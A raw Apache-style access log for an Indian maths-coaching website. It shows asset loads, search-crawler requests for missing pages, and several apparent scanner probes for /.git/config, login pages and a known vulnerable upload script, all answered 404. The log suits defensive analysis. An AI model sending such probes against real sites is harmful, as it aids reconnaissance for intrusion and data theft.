122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-5.jpg HTTP/1.1" 200 60747 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-9.jpg HTTP/1.1" 200 76603 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-6.jpg HTTP/1.1" 200 73331 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-7.jpg HTTP/1.1" 200 60747 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/slider/slider-2.jpg HTTP/1.1" 200 570062 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-11.jpg HTTP/1.1" 200 64515 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-8.jpg HTTP/1.1" 200 76653 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-12.jpg HTTP/1.1" 200 59825 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/course/course-10.jpg HTTP/1.1" 200 82845 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/bg/bg-6.jpg HTTP/1.1" 200 345311 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/bg/bg-5.jpg HTTP/1.1" 200 299422 "https://bhaskarclasses.com/demo/assets/css/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.79.108 - - [01/Aug/2021:14:43:14 +0000] "GET /demo/assets/img/bg/bg-4.jpg HTTP/1.1" 200 243409 "https://bhaskarclasses.com/demo/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
207.46.13.29 - - [01/Aug/2021:14:47:40 +0000] "GET /12th-class-maths-tuition-in-sohna-sector-6-gurgaon HTTP/1.1" 404 248 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.60 - - [01/Aug/2021:14:48:19 +0000] "GET /best-iit-jee-maths-coaching-in-vasundhara-sector-13-ghaziabad HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.29 - - [01/Aug/2021:14:52:39 +0000] "GET /iit-jee-maths-online-coaching-in-munirka-new-delhi/ HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.104 - - [01/Aug/2021:14:53:39 +0000] "GET /ib-maths-online-coaching-in-dwarka-new-delhi/ HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.34 - - [01/Aug/2021:14:57:13 +0000] "GET /best-iit-jee-maths-coaching-in-dwarka-new-delhi HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [01/Aug/2021:15:40:31 +0000] "GET /ib-maths-online-coaching-in-vasundhara-sector-10-ghaziabad HTTP/1.1" 404 256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.63 - - [01/Aug/2021:15:55:49 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.136 - - [01/Aug/2021:15:55:49 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.60 - - [01/Aug/2021:15:59:27 +0000] "GET /ib-maths-online-coaching-in-dashrath-puri-new-delhi/ HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [01/Aug/2021:16:41:06 +0000] "GET /best-btech-maths-coaching-in-sector-50-gurgaon/ HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [01/Aug/2021:17:02:30 +0000] "GET /iit-jee-maths-online-coaching-in-jhuljhuli-new-delhi/ HTTP/1.1" 404 251 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.60 - - [01/Aug/2021:17:02:34 +0000] "GET /best-iit-jee-maths-coaching-in-vasundhara-sector-13-ghaziabad HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.248.100.56 - - [01/Aug/2021:17:05:33 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
207.46.13.104 - - [01/Aug/2021:17:12:02 +0000] "GET /ib-maths-online-coaching-in-dwarka-new-delhi/ HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
114.119.128.57 - - [01/Aug/2021:17:12:20 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.167.74 - - [01/Aug/2021:17:15:19 +0000] "GET /best-ib-maths-coaching-in-sector-24-gurgaon/ HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.118 - - [01/Aug/2021:17:28:42 +0000] "GET /best-ib-maths-coaching-in-sarsuna-kolkata HTTP/1.1" 404 239 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [01/Aug/2021:17:43:01 +0000] "GET /ib-maths-online-coaching-in-vasundhara-sector-10-ghaziabad HTTP/1.1" 404 256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.29 - - [01/Aug/2021:17:45:23 +0000] "GET /ib-maths-online-coaching-in-roop-nagar-new-delhi/ HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.17 - - [01/Aug/2021:18:09:51 +0000] "GET /ib-maths-online-coaching-in-sohna-sector-25-gurgaon/ HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.34 - - [01/Aug/2021:18:47:24 +0000] "GET /12th-class-maths-online-coaching-in-shelley-perth HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.34 - - [01/Aug/2021:19:38:48 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.118 - - [01/Aug/2021:19:41:26 +0000] "GET /best-ib-maths-coaching-in-sarsuna-kolkata HTTP/1.1" 404 239 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [01/Aug/2021:19:46:43 +0000] "GET /best-ib-maths-coaching-in-sector-24-gurgaon/ HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.29 - - [01/Aug/2021:19:50:57 +0000] "GET /ib-maths-online-coaching-in-roop-nagar-new-delhi/ HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.17 - - [01/Aug/2021:19:51:30 +0000] "GET /btech-maths-coaching-in-huntington-west-virginia-usa HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.51 - - [01/Aug/2021:20:40:47 +0000] "GET /11th-class-maths-online-coaching-in-malka-ganj-new-delhi HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
18.159.196.172 - - [01/Aug/2021:21:21:34 +0000] "GET /.well-known/acme-challenge/KEfbnFUPm-xAjg9qqqba5Evo7mnOXjYD8o91cuC06q8 HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
52.39.4.59 - - [01/Aug/2021:21:21:34 +0000] "GET /.well-known/acme-challenge/KEfbnFUPm-xAjg9qqqba5Evo7mnOXjYD8o91cuC06q8 HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.116.86.117 - - [01/Aug/2021:21:21:34 +0000] "GET /.well-known/acme-challenge/KEfbnFUPm-xAjg9qqqba5Evo7mnOXjYD8o91cuC06q8 HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.133.109.36 - - [01/Aug/2021:21:21:34 +0000] "GET /.well-known/acme-challenge/KEfbnFUPm-xAjg9qqqba5Evo7mnOXjYD8o91cuC06q8 HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.220.20.68 - - [01/Aug/2021:21:29:41 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.221.234.248 - - [01/Aug/2021:21:47:01 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
157.55.39.43 - - [01/Aug/2021:21:57:19 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.43 - - [01/Aug/2021:21:57:20 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.34 - - [01/Aug/2021:21:57:21 +0000] "GET /12th-class-maths-home-tutors-in-tilak-marg-new-delhi/ HTTP/1.1" 404 251 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.17 - - [01/Aug/2021:22:01:42 +0000] "GET /iit-jee-maths-online-coaching-in-southern-avenue-kolkata HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
93.158.66.18 - - [01/Aug/2021:22:07:00 +0000] "HEAD /.git/config HTTP/1.1" 404 - "-" "python-requests/2.26.0"
93.158.66.18 - - [01/Aug/2021:22:07:12 +0000] "HEAD /.git/config HTTP/1.1" 404 - "-" "python-requests/2.26.0"
207.46.13.118 - - [01/Aug/2021:22:13:21 +0000] "GET /best-btech-maths-coaching-in-sector-79-gurgaon/ HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.149.89 - - [01/Aug/2021:22:36:47 +0000] "GET /11th-class-maths-online-coaching-in-lakshmi-bai-nagar-new-delhi HTTP/1.1" 404 261 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.118 - - [01/Aug/2021:23:32:07 +0000] "GET /best-ib-maths-coaching-in-satbari-new-delhi/ HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.74 - - [01/Aug/2021:23:36:48 +0000] "GET /ib-maths-tuition-in-sector-20-faridabad HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.42 - - [01/Aug/2021:23:42:29 +0000] "GET /11th-class-maths-online-coaching-in-punjabi-bagh-new-delhi HTTP/1.1" 404 256 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.17 - - [02/Aug/2021:00:25:46 +0000] "GET /iit-jee-maths-online-coaching-in-southern-avenue-kolkata HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
193.169.254.217 - - [02/Aug/2021:00:27:20 +0000] "GET /sites/default/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php HTTP/1.1" 404 288 "http://bhaskarclasses.com/sites/default/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
40.77.167.74 - - [02/Aug/2021:01:24:49 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.1 - - [02/Aug/2021:01:26:10 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.1 - - [02/Aug/2021:01:26:11 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.0 - - [02/Aug/2021:01:26:19 +0000] "GET /best-maths-coaching-near-me-in-burari-new-delhi HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.118 - - [02/Aug/2021:01:49:10 +0000] "GET /best-ib-maths-coaching-in-satbari-new-delhi/ HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.149.46 - - [02/Aug/2021:03:06:14 +0000] "GET /11th-class-maths-online-coaching-in-rohini-sector-35-new-delhi HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
40.77.167.74 - - [02/Aug/2021:03:17:58 +0000] "GET /btech-maths-coaching-in-buckhannon-west-virginia-usa HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.29 - - [02/Aug/2021:03:33:25 +0000] "GET /best-iit-jee-maths-coaching-in-dilshad-garden-new-delhi/ HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
203.159.80.168 - - [02/Aug/2021:04:00:34 +0000] "GET /administrator/index.php HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
157.55.39.131 - - [02/Aug/2021:04:06:45 +0000] "GET /best-12th-class-maths-coaching-in-dwarka-sector-23-new-delhi/ HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.138 - - [02/Aug/2021:04:09:57 +0000] "GET /11th-class-maths-online-coaching-in-rohini-sector-16-new-delhi HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.7 - - [02/Aug/2021:04:41:20 +0000] "GET /11th-class-maths-online-coaching-in-rohini-sector-8-new-delhi HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.13 - - [02/Aug/2021:05:00:42 +0000] "GET /11th-class-maths-online-coaching-in-sarojini-nagar-new-delhi HTTP/1.1" 404 258 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.34 - - [02/Aug/2021:05:01:22 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.241 - - [02/Aug/2021:05:07:57 +0000] "GET /11th-class-maths-online-coaching-in-mandi-house-new-delhi HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.81 - - [02/Aug/2021:05:11:43 +0000] "GET /11th-class-maths-online-coaching-in-rani-bagh-new-delhi HTTP/1.1" 404 253 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.90.181.222 - - [02/Aug/2021:05:13:57 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
54.36.148.247 - - [02/Aug/2021:05:19:49 +0000] "GET /11th-class-maths-online-coaching-in-rohini-sector-6-new-delhi HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.104 - - [02/Aug/2021:05:25:15 +0000] "GET /best-ib-maths-coaching-in-sector-103-gurgaon/ HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.42 - - [02/Aug/2021:05:28:16 +0000] "GET /11th-class-maths-online-coaching-in-sadiq-nagar-new-delhi HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.112 - - [02/Aug/2021:05:32:57 +0000] "GET /11th-class-maths-online-coaching-in-pushp-vihar-new-delhi HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.73 - - [02/Aug/2021:05:41:33 +0000] "GET /11th-class-maths-online-coaching-in-naraina-new-delhi HTTP/1.1" 404 251 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.66.207 - - [02/Aug/2021:05:42:48 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.92.207 - - [02/Aug/2021:05:42:49 +0000] "GET / HTTP/1.1" 403 209 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
207.46.13.29 - - [02/Aug/2021:05:43:15 +0000] "GET /best-iit-jee-maths-coaching-in-dilshad-garden-new-delhi/ HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
222.243.213.44 - - [02/Aug/2021:05:45:29 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36"
157.55.39.131 - - [02/Aug/2021:06:44:09 +0000] "GET /12th-class-maths-tuition-in-lohia-nagar-ghaziabad HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.149.60 - - [02/Aug/2021:06:44:33 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.30 - - [02/Aug/2021:06:44:34 +0000] "GET /11th-class-maths-online-coaching-in-lal-kuan-new-delhi HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.104 - - [02/Aug/2021:07:29:24 +0000] "GET /best-ib-maths-coaching-in-sector-103-gurgaon/ HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
122.161.75.98 - - [02/Aug/2021:08:02:43 +0000] "GET /demo HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/ HTTP/1.1" 200 54643 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/css/icons.min.css HTTP/1.1" 200 98372 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/css/bootstrap.min.css HTTP/1.1" 200 155799 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/css/plugins.css HTTP/1.1" 200 30035 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/vendor/modernizr-3.11.7.min.js HTTP/1.1" 200 8620 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/css/style.css HTTP/1.1" 200 195104 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/vendor/jquery-v2.2.4.min.js HTTP/1.1" 200 85578 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/popper.min.js HTTP/1.1" 200 18556 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/bootstrap.min.js HTTP/1.1" 200 60048 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/plugins.js HTTP/1.1" 200 172668 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/ajax-mail.js HTTP/1.1" 200 1201 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/js/main.js HTTP/1.1" 200 18493 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/icon-img/video.png HTTP/1.1" 200 2662 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/logo/logo.png HTTP/1.1" 200 17918 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/banner/banner-3.jpg HTTP/1.1" 200 39367 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/icon-img/signature.png HTTP/1.1" 200 2952 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/icon-img/service-5.png HTTP/1.1" 200 2273 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/course/course-5.jpg HTTP/1.1" 200 60747 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/course/course-9.jpg HTTP/1.1" 200 76603 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/course/course-6.jpg HTTP/1.1" 200 73331 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/course/course-10.jpg HTTP/1.1" 200 82845 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/course/course-7.jpg HTTP/1.1" 200 60747 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
122.161.75.98 - - [02/Aug/2021:08:02:44 +0000] "GET /demo/assets/img/icon-img/header-shape.png HTTP/1.1" 200 1577 "https://bhaskarclasses.com/demo/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"
